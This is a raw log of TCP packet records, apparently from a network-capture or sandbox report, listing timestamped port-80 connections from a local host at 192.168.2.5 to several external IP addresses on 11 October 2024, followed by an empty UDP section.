                                                                                                                                                                                                                                    Oct 11, 2024 15:10:16.678915977 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:16.679157972 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:16.819578886 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:16.824723959 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:17.838144064 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:17.844943047 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:17.845174074 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:17.852786064 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:17.857781887 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:18.377603054 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:18.377907038 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:18.378066063 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:18.380620956 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:18.386487007 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.778773069 CEST4999880192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.784204006 CEST8049998206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.784284115 CEST4999880192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.798057079 CEST4999880192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.803214073 CEST8049998206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:24.685511112 CEST8049998206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:24.685774088 CEST8049998206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:24.685843945 CEST4999880192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:25.308831930 CEST4999880192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:26.322077036 CEST4999980192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:26.327347994 CEST8049999206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:26.327440977 CEST4999980192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:26.337240934 CEST4999980192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:26.342529058 CEST8049999206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:27.258616924 CEST8049999206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:27.258943081 CEST8049999206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:27.259005070 CEST4999980192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:27.908209085 CEST4999980192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:28.920008898 CEST5000080192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:28.925522089 CEST8050000206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:28.928155899 CEST5000080192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:28.943103075 CEST5000080192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:28.948101997 CEST8050000206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:28.948190928 CEST8050000206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:29.825510025 CEST8050000206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:29.825783014 CEST8050000206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:29.825860977 CEST5000080192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:30.444570065 CEST5000080192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:31.465085983 CEST5000180192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:31.470268965 CEST8050001206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:31.470406055 CEST5000180192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:31.477698088 CEST5000180192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:31.482578993 CEST8050001206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:32.372220993 CEST8050001206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:32.372894049 CEST8050001206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:32.372951984 CEST5000180192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:32.374948025 CEST5000180192.168.2.5206.119.82.147
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:32.379972935 CEST8050001206.119.82.147192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.597213984 CEST5000280192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.602269888 CEST805000285.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.602504969 CEST5000280192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.611212969 CEST5000280192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.616183996 CEST805000285.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:39.116173983 CEST5000280192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:39.121814966 CEST805000285.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:39.121925116 CEST5000280192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:40.135433912 CEST5000380192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:40.140629053 CEST805000385.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:40.140722990 CEST5000380192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:40.151999950 CEST5000380192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:40.157141924 CEST805000385.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:41.662947893 CEST5000380192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:41.878912926 CEST805000385.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:41.878973007 CEST5000380192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:42.682964087 CEST5000480192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:42.688003063 CEST805000485.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:42.688088894 CEST5000480192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:42.702403069 CEST5000480192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:42.707247972 CEST805000485.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:42.707428932 CEST805000485.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:44.209820986 CEST5000480192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:44.215039968 CEST805000485.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:44.215101957 CEST5000480192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.229077101 CEST5000580192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.288125992 CEST805000585.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.288335085 CEST5000580192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.294245958 CEST5000580192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.299047947 CEST805000585.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.986139059 CEST805000585.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.986676931 CEST805000585.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.986721039 CEST5000580192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.989196062 CEST5000580192.168.2.585.159.66.93
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.994416952 CEST805000585.159.66.93192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.017072916 CEST5000680192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.021979094 CEST8050006104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.023185968 CEST5000680192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.035074949 CEST5000680192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.040136099 CEST8050006104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.990077972 CEST8050006104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.990888119 CEST8050006104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.990952015 CEST5000680192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.991146088 CEST8050006104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.991209984 CEST5000680192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:52.538079023 CEST5000680192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:53.556595087 CEST5000780192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:53.561844110 CEST8050007104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:53.564147949 CEST5000780192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:53.576061010 CEST5000780192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:53.581151009 CEST8050007104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:54.548753977 CEST8050007104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:54.548788071 CEST8050007104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:54.548823118 CEST8050007104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:54.548857927 CEST5000780192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:54.548897028 CEST5000780192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:55.087424994 CEST5000780192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:56.104157925 CEST5000880192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:56.433562040 CEST8050008104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:56.433687925 CEST5000880192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:56.443002939 CEST5000880192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:56.448015928 CEST8050008104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:56.448281050 CEST8050008104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.283760071 CEST8050008104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.283896923 CEST8050008104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.285259962 CEST5000880192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:57.944284916 CEST5000880192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.963094950 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.969918013 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.970199108 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.976104021 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:58.982182026 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855504990 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855571985 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855693102 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.855999947 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.856070042 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.862699032 CEST5000980192.168.2.5104.21.42.219
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:59.868853092 CEST8050009104.21.42.219192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.889868975 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.894965887 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.895493031 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.907160044 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.912312984 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:05.517242908 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:05.517621994 CEST8050010162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:05.517765045 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:06.412935972 CEST5001080192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.431361914 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.436774969 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.436901093 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.447925091 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:07.453250885 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.064826965 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.065443039 CEST8050011162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.065486908 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:08.960056067 CEST5001180192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.977893114 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.982978106 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.983083010 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.996279001 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.001413107 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.001580000 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.653997898 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.655610085 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.655682087 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:11.507091999 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.525270939 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.530702114 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.530777931 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.537889957 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.543003082 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.124404907 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.124540091 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.124797106 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.126990080 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.132312059 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.252152920 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.257127047 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.257204056 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.270160913 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.275842905 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.130822897 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.131222963 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.131315947 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.772351980 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.825586081 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.830825090 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.831470966 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.914417982 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.919430017 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:21.725495100 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:21.725625038 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:21.725812912 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:22.428519011 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.486490965 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.491470098 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.491564989 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.558125973 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.563119888 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.563205957 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:24.405448914 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:24.406253099 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:24.406502008 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:25.100519896 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.271992922 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.277087927 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.283235073 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.333060026 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.338330030 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797785997 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797815084 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797837019 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797965050 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798520088 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798537970 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798572063 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.799335957 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.799354076 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.799376965 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800157070 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800178051 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800194979 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800199986 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800245047 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.803169012 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.803219080 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.803261995 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.803335905 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.850312948 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.005614042 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.005743027 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.005785942 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.005882025 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.006403923 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.006742954 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.006774902 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.006891966 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.006891966 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.007488966 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.007520914 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.008285046 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.008315086 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.008321047 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.008435011 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.009155989 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.009188890 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.009221077 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.009243965 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.009903908 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.009937048 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.010706902 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.010714054 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.010740995 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.011025906 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.011531115 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.011564016 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.011589050 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.012321949 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.012353897 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.012983084 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.013016939 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.013041973 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.013051033 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.015641928 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.212874889 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.213016033 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.213047028 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.213305950 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.213396072 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.213430882 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.213468075 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.215497971 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.219441891 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:28.224333048 CEST8050017103.249.106.91192.168.2.5

                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
